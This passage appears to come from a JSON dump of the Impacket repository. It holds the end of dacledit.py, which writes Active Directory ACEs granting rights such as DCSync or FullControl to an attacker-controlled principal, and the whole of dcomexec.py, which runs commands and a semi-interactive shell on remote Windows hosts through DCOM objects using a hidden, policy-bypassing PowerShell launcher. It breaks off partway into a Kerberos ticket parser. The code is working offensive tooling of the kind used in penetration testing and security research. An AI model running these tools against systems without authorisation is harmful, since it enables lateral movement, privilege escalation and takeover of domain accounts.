metavar=\"hostname\", help='Hostname of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted, -dc-ip will be used')\n\n principal_parser = parser.add_argument_group(\"principal\", description=\"Object, controlled by the attacker, to reference in the ACE to create or to filter when printing a DACL\")\n principal_parser.add_argument(\"-principal\", dest=\"principal_sAMAccountName\", metavar=\"NAME\", type=str, required=False, help=\"sAMAccountName\")\n principal_parser.add_argument(\"-principal-sid\", dest=\"principal_SID\", metavar=\"SID\", type=str, required=False, help=\"Security IDentifier\")\n principal_parser.add_argument(\"-principal-dn\", dest=\"principal_DN\", metavar=\"DN\", type=str, required=False, help=\"Distinguished Name\")\n\n target_parser = parser.add_argument_group(\"target\", description=\"Principal object to read/edit the DACL of\")\n target_parser.add_argument(\"-target\", dest=\"target_sAMAccountName\", metavar=\"NAME\", type=str, required=False, help=\"sAMAccountName\")\n target_parser.add_argument(\"-target-sid\", dest=\"target_SID\", metavar=\"SID\", type=str, required=False, help=\"Security IDentifier\")\n target_parser.add_argument(\"-target-dn\", dest=\"target_DN\", metavar=\"DN\", type=str, required=False, help=\"Distinguished Name\")\n\n dacl_parser = parser.add_argument_group(\"dacl editor\")\n dacl_parser.add_argument('-action', choices=['read', 'write', 'remove', 'backup', 'restore'], nargs='?', default='read', help='Action to operate on the DACL')\n dacl_parser.add_argument('-file', dest=\"filename\", type=str, help='Filename/path (optional for -action backup, required for -restore))')\n dacl_parser.add_argument('-ace-type', choices=['allowed', 'denied'], nargs='?', default='allowed', help='The ACE Type (access allowed or denied) that must be added or removed (default: allowed)')\n dacl_parser.add_argument('-rights', choices=['FullControl', 'ResetPassword', 'WriteMembers', 'DCSync', 'Custom'], nargs='?', default='FullControl', help='Rights to write/remove in the target DACL (default: FullControl)')\n dacl_parser.add_argument('-rights-guid', type=str, help='Manual GUID representing the right to write/remove')\n dacl_parser.add_argument('-mask', nargs='?', default=None, help='Force access mask, possible values: readwrite, write, self, allext, 0xXXXXX. Useful with -rights Custom or --rights-guid where the mask is different of read+write.')\n dacl_parser.add_argument('-inheritance', action=\"store_true\", help='Enable the inheritance in the ACE flag with CONTAINER_INHERIT_ACE and OBJECT_INHERIT_ACE. Useful when target is a Container or an OU, '\n 'ACE will be inherited by objects within the container/OU (except objects with adminCount=1)')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n return parser.parse_args()\n\n\ndef main():\n print(version.BANNER)\n args = parse_args()\n logger.init(args.ts, args.debug)\n\n if args.action == 'write' and args.principal_sAMAccountName is None and args.principal_SID is None and args.principal_DN is None:\n logging.critical('-principal, -principal-sid, or -principal-dn should be specified when using -action write')\n sys.exit(1)\n\n if args.action == \"restore\" and not args.filename:\n logging.critical('-file is required when using -action restore')\n\n domain, username, password, lmhash, nthash, args.k = parse_identity(args.identity, args.hashes, args.no_pass, args.aesKey, args.k)\n\n try:\n ldap_server, ldap_session = init_ldap_session(domain, username, password, lmhash, nthash, args.k, args.dc_ip, args.dc_host, args.aesKey, args.use_ldaps)\n dacledit = DACLedit(ldap_server, ldap_session, args)\n if args.action == 'read':\n dacledit.read()\n elif args.action == 'write':\n dacledit.write()\n elif args.action == 'remove':\n dacledit.remove()\n elif args.action == 'flush':\n dacledit.flush()\n elif args.action == 'backup':\n dacledit.backup()\n elif args.action == 'restore':\n dacledit.restore()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n traceback.print_exc()\n logging.error(str(e))\n\n\nif __name__ == '__main__':\n main()\n" }, { "path": "examples/dcomexec.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# A similar approach to psexec but executing commands through DCOM.\n# You can select different objects to be used to execute the commands.\n# Currently supported objects are:\n# 1. MMC20.Application (49B2791A-B1AE-4C90-9B8E-E860BA07F889) - Tested Windows 7, Windows 10, Server 2012R2\n# 2. ShellWindows (9BA05972-F6A8-11CF-A442-00A0C90A8F39) - Tested Windows 7, Windows 10, Server 2012R2\n# 3. ShellBrowserWindow (C08AFD90-F2A1-11D1-8455-00A0C91F3880) - Tested Windows 10, Server 2012R2\n#\n# Drawback is it needs DCOM, hence, I have to be able to access\n# DCOM ports at the target machine.\n#\n# Original discovery by Matt Nelson (@enigma0x3):\n# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/\n# https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/\n#\n# Author:\n# beto (@agsolino)\n# Marcello (@byt3bl33d3r)\n#\n# Reference for:\n# DCOM\n#\n# ToDo:\n# [ ] Kerberos auth not working, invalid_checksum is thrown. Most probably sequence numbers out of sync due to\n# getInterface() method\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\nimport cmd\nimport logging\nimport ntpath\nimport os\nimport sys\nimport time\nfrom base64 import b64encode\n\nfrom six import PY2, PY3\nfrom impacket import version\nfrom impacket.dcerpc.v5.dcom.oaut import IID_IDispatch, string_to_bin, IDispatch, DISPPARAMS, DISPATCH_PROPERTYGET, \\\n VARIANT, VARENUM, DISPATCH_METHOD\nfrom impacket.dcerpc.v5.dcomrt import DCOMConnection, COMVERSION\nfrom impacket.dcerpc.v5.dcomrt import OBJREF, FLAGS_OBJREF_CUSTOM, OBJREF_CUSTOM, OBJREF_HANDLER, \\\n OBJREF_EXTENDED, OBJREF_STANDARD, FLAGS_OBJREF_HANDLER, FLAGS_OBJREF_STANDARD, FLAGS_OBJREF_EXTENDED, \\\n IRemUnknown2, INTERFACE\nfrom impacket.dcerpc.v5.dtypes import NULL\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket.smbconnection import SMBConnection, SMB_DIALECT, SMB2_DIALECT_002, SMB2_DIALECT_21\nfrom impacket.krb5.keytab import Keytab\n\nOUTPUT_FILENAME = '__' + str(time.time())[:5]\nCODEC = sys.stdout.encoding\n\nclass DCOMEXEC:\n def __init__(self, command='', username='', password='', domain='', hashes=None, aesKey=None, share=None,\n noOutput=False, doKerberos=False, kdcHost=None, dcomObject=None, shell_type=None):\n self.__command = command\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = aesKey\n self.__share = share\n self.__noOutput = noOutput\n self.__doKerberos = doKerberos\n self.__kdcHost = kdcHost\n self.__dcomObject = dcomObject\n self.__shell_type = shell_type\n self.shell = None\n if hashes is not None:\n self.__lmhash, self.__nthash = hashes.split(':')\n\n def getInterface(self, interface, resp):\n # Now let's parse the answer and build an Interface instance\n objRefType = OBJREF(b''.join(resp))['flags']\n objRef = None\n if objRefType == FLAGS_OBJREF_CUSTOM:\n objRef = OBJREF_CUSTOM(b''.join(resp))\n elif objRefType == FLAGS_OBJREF_HANDLER:\n objRef = OBJREF_HANDLER(b''.join(resp))\n elif objRefType == FLAGS_OBJREF_STANDARD:\n objRef = OBJREF_STANDARD(b''.join(resp))\n elif objRefType == FLAGS_OBJREF_EXTENDED:\n objRef = OBJREF_EXTENDED(b''.join(resp))\n else:\n logging.error(\"Unknown OBJREF Type! 0x%x\" % objRefType)\n\n return IRemUnknown2(\n INTERFACE(interface.get_cinstance(), None, interface.get_ipidRemUnknown(), objRef['std']['ipid'],\n oxid=objRef['std']['oxid'], oid=objRef['std']['oxid'],\n target=interface.get_target()))\n\n def run(self, addr, silentCommand=False):\n if self.__noOutput is False and silentCommand is False:\n smbConnection = SMBConnection(addr, addr)\n if self.__doKerberos is False:\n smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)\n else:\n smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,\n self.__nthash, self.__aesKey, kdcHost=self.__kdcHost)\n\n dialect = smbConnection.getDialect()\n if dialect == SMB_DIALECT:\n logging.info(\"SMBv1 dialect used\")\n elif dialect == SMB2_DIALECT_002:\n logging.info(\"SMBv2.0 dialect used\")\n elif dialect == SMB2_DIALECT_21:\n logging.info(\"SMBv2.1 dialect used\")\n else:\n logging.info(\"SMBv3.0 dialect used\")\n else:\n smbConnection = None\n\n dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,\n self.__aesKey, oxidResolver=True, doKerberos=self.__doKerberos, kdcHost=self.__kdcHost)\n try:\n dispParams = DISPPARAMS(None, False)\n dispParams['rgvarg'] = NULL\n dispParams['rgdispidNamedArgs'] = NULL\n dispParams['cArgs'] = 0\n dispParams['cNamedArgs'] = 0\n\n if self.__dcomObject == 'ShellWindows':\n # ShellWindows CLSID (Windows 7, Windows 10, Windows Server 2012R2)\n iInterface = dcom.CoCreateInstanceEx(string_to_bin('9BA05972-F6A8-11CF-A442-00A0C90A8F39'), IID_IDispatch)\n iMMC = IDispatch(iInterface)\n resp = iMMC.GetIDsOfNames(('Item',))\n resp = iMMC.Invoke(resp[0], 0x409, DISPATCH_METHOD, dispParams, 0, [], [])\n iItem = IDispatch(self.getInterface(iMMC, resp['pVarResult']['_varUnion']['pdispVal']['abData']))\n resp = iItem.GetIDsOfNames(('Document',))\n resp = iItem.Invoke(resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], [])\n pQuit = None\n elif self.__dcomObject == 'ShellBrowserWindow':\n # ShellBrowserWindow CLSID (Windows 10, Windows Server 2012R2)\n iInterface = dcom.CoCreateInstanceEx(string_to_bin('C08AFD90-F2A1-11D1-8455-00A0C91F3880'), IID_IDispatch)\n iMMC = IDispatch(iInterface)\n resp = iMMC.GetIDsOfNames(('Document',))\n resp = iMMC.Invoke(resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], [])\n pQuit = iMMC.GetIDsOfNames(('Quit',))[0]\n elif self.__dcomObject == 'MMC20':\n iInterface = dcom.CoCreateInstanceEx(string_to_bin('49B2791A-B1AE-4C90-9B8E-E860BA07F889'), IID_IDispatch)\n iMMC = IDispatch(iInterface)\n resp = iMMC.GetIDsOfNames(('Document',))\n resp = iMMC.Invoke(resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], [])\n pQuit = iMMC.GetIDsOfNames(('Quit',))[0]\n else:\n logging.fatal('Invalid object %s' % self.__dcomObject)\n return\n\n iDocument = IDispatch(self.getInterface(iMMC, resp['pVarResult']['_varUnion']['pdispVal']['abData']))\n\n if self.__dcomObject == 'MMC20':\n resp = iDocument.GetIDsOfNames(('ActiveView',))\n resp = iDocument.Invoke(resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], [])\n\n iActiveView = IDispatch(self.getInterface(iMMC, resp['pVarResult']['_varUnion']['pdispVal']['abData']))\n pExecuteShellCommand = iActiveView.GetIDsOfNames(('ExecuteShellCommand',))[0]\n self.shell = RemoteShellMMC20(self.__share, (iMMC, pQuit), (iActiveView, pExecuteShellCommand), smbConnection, self.__shell_type, silentCommand)\n else:\n resp = iDocument.GetIDsOfNames(('Application',))\n resp = iDocument.Invoke(resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], [])\n\n iActiveView = IDispatch(self.getInterface(iMMC, resp['pVarResult']['_varUnion']['pdispVal']['abData']))\n pExecuteShellCommand = iActiveView.GetIDsOfNames(('ShellExecute',))[0]\n self.shell = RemoteShell(self.__share, (iMMC, pQuit), (iActiveView, pExecuteShellCommand), smbConnection, self.__shell_type, silentCommand)\n\n if self.__command != ' ':\n try:\n self.shell.onecmd(self.__command)\n except TypeError:\n if not silentCommand:\n raise\n if self.shell is not None:\n self.shell.do_exit('')\n else:\n self.shell.cmdloop()\n except (Exception, KeyboardInterrupt) as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n if self.shell is not None:\n self.shell.do_exit('')\n logging.error(str(e))\n if smbConnection is not None:\n smbConnection.logoff()\n dcom.disconnect()\n sys.stdout.flush()\n sys.exit(1)\n\n if smbConnection is not None:\n smbConnection.logoff()\n dcom.disconnect()\n\nclass RemoteShell(cmd.Cmd):\n def __init__(self, share, quit, executeShellCommand, smbConnection, shell_type, silentCommand=False):\n cmd.Cmd.__init__(self)\n self._share = share\n self._output = '\\\\' + OUTPUT_FILENAME\n self.__outputBuffer = ''\n self._shell = 'cmd.exe'\n self.__shell_type = shell_type\n self.__pwsh = 'powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc '\n self.__quit = quit\n self._executeShellCommand = executeShellCommand\n self.__transferClient = smbConnection\n self._silentCommand = silentCommand\n self._pwd = 'C:\\\\windows\\\\system32'\n self._noOutput = False\n self.intro = '[!] Launching semi-interactive shell - Careful what you execute\\n[!] Press help for extra shell commands'\n\n # We don't wanna deal with timeouts from now on.\n if self.__transferClient is not None:\n self.__transferClient.setTimeout(100000)\n self.do_cd('\\\\')\n else:\n self._noOutput = True\n\n def do_shell(self, s):\n os.system(s)\n\n def do_help(self, line):\n print(\"\"\"\n lcd {path} - changes the current local directory to {path}\n exit - terminates the server process (and this session)\n lput {src_file, dst_path} - uploads a local file to the dst_path (dst_path = default current directory)\n lget {file} - downloads pathname to the current local dir\n ! {cmd} - executes a local shell cmd\n\"\"\")\n\n def do_lcd(self, s):\n if s == '':\n print(os.getcwd())\n else:\n try:\n os.chdir(s)\n except Exception as e:\n logging.error(str(e))\n\n def do_lget(self, src_path):\n try:\n import ntpath\n newPath = ntpath.normpath(ntpath.join(self._pwd, src_path))\n drive, tail = ntpath.splitdrive(newPath)\n filename = ntpath.basename(tail)\n fh = open(filename,'wb')\n logging.info(\"Downloading %s\\\\%s\" % (drive, tail))\n self.__transferClient.getFile(drive[:-1]+'$', tail, fh.write)\n fh.close()\n except Exception as e:\n logging.error(str(e))\n os.remove(filename)\n pass\n\n def do_lput(self, s):\n try:\n params = s.split(' ')\n if len(params) > 1:\n src_path = params[0]\n dst_path = params[1]\n elif len(params) == 1:\n src_path = params[0]\n dst_path = ''\n\n src_file = os.path.basename(src_path)\n fh = open(src_path, 'rb')\n dst_path = dst_path.replace('/','\\\\')\n import ntpath\n pathname = ntpath.join(ntpath.join(self._pwd, dst_path), src_file)\n drive, tail = ntpath.splitdrive(pathname)\n logging.info(\"Uploading %s to %s\" % (src_file, pathname))\n self.__transferClient.putFile(drive[:-1]+'$', tail, fh.read)\n fh.close()\n except Exception as e:\n logging.critical(str(e))\n pass\n\n def do_exit(self, s):\n dispParams = DISPPARAMS(None, False)\n dispParams['rgvarg'] = NULL\n dispParams['rgdispidNamedArgs'] = NULL\n dispParams['cArgs'] = 0\n dispParams['cNamedArgs'] = 0\n\n self.__quit[0].Invoke(self.__quit[1], 0x409, DISPATCH_METHOD, dispParams,\n 0, [], [])\n return True\n\n def do_EOF(self, s):\n print()\n return self.do_exit(s)\n\n def emptyline(self):\n return False\n\n def do_cd(self, s):\n self.execute_remote('cd ' + s)\n if len(self.__outputBuffer.strip('\\r\\n')) > 0:\n print(self.__outputBuffer)\n self.__outputBuffer = ''\n else:\n if PY2:\n self._pwd = ntpath.normpath(ntpath.join(self._pwd, s.decode(sys.stdin.encoding)))\n else:\n self._pwd = ntpath.normpath(ntpath.join(self._pwd, s))\n self.execute_remote('cd ')\n self._pwd = self.__outputBuffer.strip('\\r\\n')\n self.prompt = (self._pwd + '>')\n if self.__shell_type == 'powershell':\n self.prompt = 'PS ' + self.prompt + ' '\n self.__outputBuffer = ''\n\n def default(self, line):\n # Let's try to guess if the user is trying to change drive\n if len(line) == 2 and line[1] == ':':\n # Execute the command and see if the drive is valid\n self.execute_remote(line)\n if len(self.__outputBuffer.strip('\\r\\n')) > 0:\n # Something went wrong\n print(self.__outputBuffer)\n self.__outputBuffer = ''\n else:\n # Drive valid, now we should get the current path\n self._pwd = line\n self.execute_remote('cd ')\n self._pwd = self.__outputBuffer.strip('\\r\\n')\n self.prompt = (self._pwd + '>')\n if self.__shell_type == 'powershell':\n self.prompt = 'PS ' + self.prompt + ' '\n self.__outputBuffer = ''\n else:\n if line != '':\n self.send_data(line)\n\n def get_output(self):\n def output_callback(data):\n try:\n self.__outputBuffer += data.decode(CODEC)\n except UnicodeDecodeError:\n logging.error('Decoding error detected, consider running chcp.com at the target,\\nmap the result with '\n 'https://docs.python.org/3/library/codecs.html#standard-encodings\\nand then execute dcomexec.py '\n 'again with -codec and the corresponding codec')\n self.__outputBuffer += data.decode(CODEC, errors='replace')\n\n if self._noOutput is True:\n self.__outputBuffer = ''\n return\n\n while True:\n try:\n self.__transferClient.getFile(self._share, self._output, output_callback)\n break\n except Exception as e:\n if str(e).find('STATUS_SHARING_VIOLATION') >=0:\n # Output not finished, let's wait\n time.sleep(1)\n pass\n elif str(e).find('Broken') >= 0:\n # The SMB Connection might have timed out, let's try reconnecting\n logging.debug('Connection broken, trying to recreate it')\n self.__transferClient.reconnect()\n return self.get_output()\n self.__transferClient.deleteFile(self._share, self._output)\n\n def execute_remote(self, data, shell_type='cmd'):\n if self._silentCommand is True:\n self._shell = data.split()[0]\n command = ' '.join(data.split()[1:])\n else:\n if shell_type == 'powershell':\n data = '$ProgressPreference=\"SilentlyContinue\";' + data\n data = self.__pwsh + b64encode(data.encode('utf-16le')).decode()\n command = '/Q /c ' + data\n\n if self._noOutput is False:\n command += ' 1> ' + '\\\\\\\\127.0.0.1\\\\%s' % self._share + self._output + ' 2>&1'\n\n logging.debug('Executing: %s' % command)\n\n dispParams = DISPPARAMS(None, False)\n dispParams['rgdispidNamedArgs'] = NULL\n dispParams['cArgs'] = 5\n dispParams['cNamedArgs'] = 0\n arg0 = VARIANT(None, False)\n arg0['clSize'] = 5\n arg0['vt'] = VARENUM.VT_BSTR\n arg0['_varUnion']['tag'] = VARENUM.VT_BSTR\n arg0['_varUnion']['bstrVal']['asData'] = self._shell\n\n arg1 = VARIANT(None, False)\n arg1['clSize'] = 5\n arg1['vt'] = VARENUM.VT_BSTR\n arg1['_varUnion']['tag'] = VARENUM.VT_BSTR\n if PY3:\n arg1['_varUnion']['bstrVal']['asData'] = command\n else:\n arg1['_varUnion']['bstrVal']['asData'] = command.decode(sys.stdin.encoding)\n\n arg2 = VARIANT(None, False)\n arg2['clSize'] = 5\n arg2['vt'] = VARENUM.VT_BSTR\n arg2['_varUnion']['tag'] = VARENUM.VT_BSTR\n arg2['_varUnion']['bstrVal']['asData'] = self._pwd\n\n arg3 = VARIANT(None, False)\n arg3['clSize'] = 5\n arg3['vt'] = VARENUM.VT_BSTR\n arg3['_varUnion']['tag'] = VARENUM.VT_BSTR\n arg3['_varUnion']['bstrVal']['asData'] = ''\n\n arg4 = VARIANT(None, False)\n arg4['clSize'] = 5\n arg4['vt'] = VARENUM.VT_BSTR\n arg4['_varUnion']['tag'] = VARENUM.VT_BSTR\n arg4['_varUnion']['bstrVal']['asData'] = '0'\n dispParams['rgvarg'].append(arg4)\n dispParams['rgvarg'].append(arg3)\n dispParams['rgvarg'].append(arg2)\n dispParams['rgvarg'].append(arg1)\n dispParams['rgvarg'].append(arg0)\n\n #print(dispParams.dump())\n\n self._executeShellCommand[0].Invoke(self._executeShellCommand[1], 0x409, DISPATCH_METHOD, dispParams,\n 0, [], [])\n self.get_output()\n\n def send_data(self, data):\n self.execute_remote(data, self.__shell_type)\n print(self.__outputBuffer)\n self.__outputBuffer = ''\n\nclass RemoteShellMMC20(RemoteShell):\n def execute_remote(self, data, shell_type='cmd'):\n if self._silentCommand is True:\n self._shell = data.split()[0]\n command = ' '.join(data.split()[1:])\n else:\n if shell_type == 'powershell':\n data = '$ProgressPreference=\"SilentlyContinue\";' + data\n data = self._RemoteShell__pwsh + b64encode(data.encode('utf-16le')).decode()\n command = '/Q /c ' + data\n\n if self._noOutput is False:\n command += ' 1> ' + '\\\\\\\\127.0.0.1\\\\%s' % self._share + self._output + ' 2>&1'\n\n dispParams = DISPPARAMS(None, False)\n dispParams['rgdispidNamedArgs'] = NULL\n dispParams['cArgs'] = 4\n dispParams['cNamedArgs'] = 0\n arg0 = VARIANT(None, False)\n arg0['clSize'] = 5\n arg0['vt'] = VARENUM.VT_BSTR\n arg0['_varUnion']['tag'] = VARENUM.VT_BSTR\n arg0['_varUnion']['bstrVal']['asData'] = self._shell\n\n arg1 = VARIANT(None, False)\n arg1['clSize'] = 5\n arg1['vt'] = VARENUM.VT_BSTR\n arg1['_varUnion']['tag'] = VARENUM.VT_BSTR\n arg1['_varUnion']['bstrVal']['asData'] = self._pwd\n\n arg2 = VARIANT(None, False)\n arg2['clSize'] = 5\n arg2['vt'] = VARENUM.VT_BSTR\n arg2['_varUnion']['tag'] = VARENUM.VT_BSTR\n if PY3:\n arg2['_varUnion']['bstrVal']['asData'] = command\n else:\n arg2['_varUnion']['bstrVal']['asData'] = command.decode(sys.stdin.encoding)\n\n arg3 = VARIANT(None, False)\n arg3['clSize'] = 5\n arg3['vt'] = VARENUM.VT_BSTR\n arg3['_varUnion']['tag'] = VARENUM.VT_BSTR\n arg3['_varUnion']['bstrVal']['asData'] = '7'\n dispParams['rgvarg'].append(arg3)\n dispParams['rgvarg'].append(arg2)\n dispParams['rgvarg'].append(arg1)\n dispParams['rgvarg'].append(arg0)\n\n self._executeShellCommand[0].Invoke(self._executeShellCommand[1], 0x409, DISPATCH_METHOD, dispParams,\n 0, [], [])\n self.get_output()\n\nclass AuthFileSyntaxError(Exception):\n\n '''raised by load_smbclient_auth_file if it encounters a syntax error\n while loading the smbclient-style authentication file.'''\n\n def __init__(self, path, lineno, reason):\n self.path=path\n self.lineno=lineno\n self.reason=reason\n\n def __str__(self):\n return 'Syntax error in auth file %s line %d: %s' % (\n self.path, self.lineno, self.reason )\n\ndef load_smbclient_auth_file(path):\n\n '''Load credentials from an smbclient-style authentication file (used by\n smbclient, mount.cifs and others). returns (domain, username, password)\n or raises AuthFileSyntaxError or any I/O exceptions.'''\n\n lineno=0\n domain=None\n username=None\n password=None\n for line in open(path):\n lineno+=1\n\n line = line.strip()\n\n if line.startswith('#') or line=='':\n continue\n\n parts = line.split('=',1)\n if len(parts) != 2:\n raise AuthFileSyntaxError(path, lineno, 'No \"=\" present in line')\n\n (k,v) = (parts[0].strip(), parts[1].strip())\n\n if k=='username':\n username=v\n elif k=='password':\n password=v\n elif k=='domain':\n domain=v\n else:\n raise AuthFileSyntaxError(path, lineno, 'Unknown option %s' % repr(k))\n\n return (domain, username, password)\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Executes a semi-interactive shell using the \"\n \"ShellBrowserWindow DCOM object.\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-share', action='store', default = 'ADMIN$', help='share where the output will be grabbed from '\n '(default ADMIN$)')\n parser.add_argument('-nooutput', action='store_true', default = False, help='whether or not to print the output '\n '(no SMB connection created)')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\\'s output (default '\n '\"%s\"). If errors are detected, run chcp.com at the target, '\n 'map the result with '\n 'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute wmiexec.py '\n 'again with -codec and the corresponding codec ' % CODEC)\n parser.add_argument('-object', choices=['ShellWindows', 'ShellBrowserWindow', 'MMC20'], nargs='?', default='ShellWindows',\n help='DCOM object to be used to execute the shell command (default=ShellWindows)')\n parser.add_argument('-com-version', action='store', metavar = \"MAJOR_VERSION:MINOR_VERSION\", help='DCOM version, '\n 'format is MAJOR_VERSION:MINOR_VERSION e.g. 5.7')\n parser.add_argument('-shell-type', action='store', default = 'cmd', choices = ['cmd', 'powershell'], help='choose '\n 'a command processor for the semi-interactive shell')\n parser.add_argument('command', nargs='*', default = ' ', help='command to execute at the target. If empty it will '\n 'launch a semi-interactive shell')\n parser.add_argument('-silentcommand', action='store_true', default = False,\n help='does not execute cmd.exe to run given command (no output, cannot run dir/cd/etc.)')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n group.add_argument('-dc-ip', action='store',metavar = \"ip address\", help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) specified in the target parameter')\n group.add_argument('-A', action=\"store\", metavar = \"authfile\", help=\"smbclient/mount.cifs-style authentication file. \"\n \"See smbclient man page's -A option.\")\n group.add_argument('-keytab', action=\"store\", help='Read keys for SPN from keytab file')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n if options.codec is not None:\n CODEC = options.codec\n else:\n if CODEC is None:\n CODEC = 'utf-8'\n\n if ' '.join(options.command) == ' ' and options.nooutput is True:\n logging.error(\"-nooutput switch and interactive shell not supported\")\n sys.exit(1)\n if options.silentcommand and options.command == ' ':\n logging.error(\"-silentcommand switch and interactive shell not supported\")\n sys.exit(1)\n\n if options.com_version is not None:\n try:\n major_version, minor_version = options.com_version.split('.')\n COMVERSION.set_default_version(int(major_version), int(minor_version))\n except Exception:\n logging.error(\"Wrong COMVERSION format, use dot separated integers e.g. \\\"5.7\\\"\")\n sys.exit(1)\n\n domain, username, password, address = parse_target(options.target)\n\n try:\n if options.A is not None:\n (domain, username, password) = load_smbclient_auth_file(options.A)\n logging.debug('loaded smbclient auth file: domain=%s, username=%s, password=%s' % (repr(domain), repr(username), repr(password)))\n\n if domain is None:\n domain = ''\n\n if options.keytab is not None:\n Keytab.loadKeysFromKeytab(options.keytab, username, domain, options)\n options.k = True\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n if options.aesKey is not None:\n options.k = True\n\n executer = DCOMEXEC(' '.join(options.command), username, password, domain, options.hashes, options.aesKey,\n options.share, options.nooutput, options.k, options.dc_ip, options.object, options.shell_type)\n executer.run(address, options.silentcommand)\n except (Exception, KeyboardInterrupt) as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n sys.exit(0)\n" }, { "path": "examples/describeTicket.py", "content": "#!/usr/bin/env python3\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Ticket describer. Parses ticket, decrypts the enc-part, and parses the PAC.\n#\n# Authors:\n# Remi Gascou (@podalirius_)\n# Charlie Bromberg (@_nwodtuhs)\n# Mathieu Calemard du Gardin (@Dramelac_)\n\nimport logging\nimport sys\nimport traceback\nimport argparse\nimport datetime\nimport base64\nfrom typing import Sequence\n\nfrom Cryptodome.Hash import MD4\nfrom enum import Enum\nfrom binascii import unhexlify, hexlify\nfrom pyasn1.codec.der import decoder\n\nfrom impacket import version\nfrom impacket.dcerpc.v5.dtypes import FILETIME, PRPC_SID\nfrom impacket.dcerpc.v5.rpcrt import TypeSerialization1\nfrom impacket.examples import logger\nfrom impacket.krb5 import constants, pac\nfrom impacket.krb5.asn1 import TGS_REP, EncTicketPart, AD_IF_RELEVANT\nfrom impacket.krb5.ccache import CCache\nfrom impacket.krb5.constants import ChecksumTypes\nfrom impacket.krb5.crypto import Key, _enctype_table, InvalidChecksum, string_to_key, generate_kerberos_keys\nfrom impacket.ldap.ldaptypes import LDAP_SID\n\nPSID = PRPC_SID\n\nclass User_Flags(Enum):\n LOGON_EXTRA_SIDS = 0x0020\n LOGON_RESOURCE_GROUPS = 0x0200\n\n# 2.2.1.10 SE_GROUP Attributes\nclass SE_GROUP_Attributes(Enum):\n SE_GROUP_MANDATORY = 0x00000001\n SE_GROUP_ENABLED_BY_DEFAULT = 0x00000002\n SE_GROUP_ENABLED = 0x00000004\n\n# 2.2.1.12 USER_ACCOUNT Codes\nclass USER_ACCOUNT_Codes(Enum):\n USER_ACCOUNT_DISABLED = 0x00000001\n USER_HOME_DIRECTORY_REQUIRED = 0x00000002\n USER_PASSWORD_NOT_REQUIRED = 0x00000004\n USER_TEMP_DUPLICATE_ACCOUNT = 0x00000008\n USER_NORMAL_ACCOUNT = 0x00000010\n USER_MNS_LOGON_ACCOUNT = 0x00000020\n USER_INTERDOMAIN_TRUST_ACCOUNT = 0x00000040\n USER_WORKSTATION_TRUST_ACCOUNT = 0x00000080\n USER_SERVER_TRUST_ACCOUNT = 0x00000100\n USER_DONT_EXPIRE_PASSWORD = 0x00000200\n USER_ACCOUNT_AUTO_LOCKED = 0x00000400\n USER_ENCRYPTED_TEXT_PASSWORD_ALLOWED = 0x00000800\n USER_SMARTCARD_REQUIRED = 0x00001000\n USER_TRUSTED_FOR_DELEGATION = 0x00002000\n USER_NOT_DELEGATED = 0x00004000\n USER_USE_DES_KEY_ONLY = 0x00008000\n USER_DONT_REQUIRE_PREAUTH = 0x00010000\n USER_PASSWORD_EXPIRED = 0x00020000\n USER_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION = 0x00040000\n USER_NO_AUTH_DATA_REQUIRED = 0x00080000\n USER_PARTIAL_SECRETS_ACCOUNT = 0x00100000\n USER_USE_AES_KEYS = 0x00200000\n\n# 